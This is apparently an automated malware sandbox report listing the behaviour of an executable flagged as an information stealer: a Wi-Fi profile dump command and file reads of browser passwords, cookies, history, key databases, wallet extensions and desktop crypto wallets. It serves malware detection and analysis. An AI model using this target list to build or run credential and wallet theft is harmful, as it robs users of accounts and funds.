                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-releaseJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.filesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chromeJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backupsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-walJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.filesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-walJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Roaming\8pecxstudios\Cyberfox\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjcaJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieafJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\protections.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkibJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpnJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10Jump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\security_stateJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-walJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\eigblbgjknlfbajkfhopmcojidlgcehmJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.filesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnkJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqlite-shmJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlfjmlcjdjgkddecgincndfgegkeckeJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jblndlipeogpafnldhgmapagcccfchpiJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.filesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ca4gppea.defaultJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bocpokimicclpaiekenaeelehdjllofoJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shmJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archivedJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\gleanJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\bookmarkbackupsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\crashes\eventsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\temporaryJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\eventsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbhJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shmJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqlite-walJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareportingJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storageJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\tmpJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiiooljJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pingsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\content-prefs.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-walJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjchihfkkindfppnaooecgfneiiiJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-walJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.filesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\defaultJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfkJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfndJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcckkdbjnoikooededlapcalpionmaloJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\to-be-removedJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-walJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmjJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\minidumpsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite-shmJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfhbebgoclkghebffdldpobeajmbecfkJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanentJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\ls-archive.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pocmplpaccanhmnllbbkpgfliimjljgoJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\crashesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-walJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.filesJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\pending_pingsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\dbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cmndjbecilbocjfkibfbifhngkdmjgogJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite-walJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Roaming\Guarda\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Roaming\Electrum\walletsJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\Desktop\WdlA0C4PkO.exeFile opened: C:\Users\Default\AppData\Roaming\Coinomi\Coinomi\walletsJump to behavior
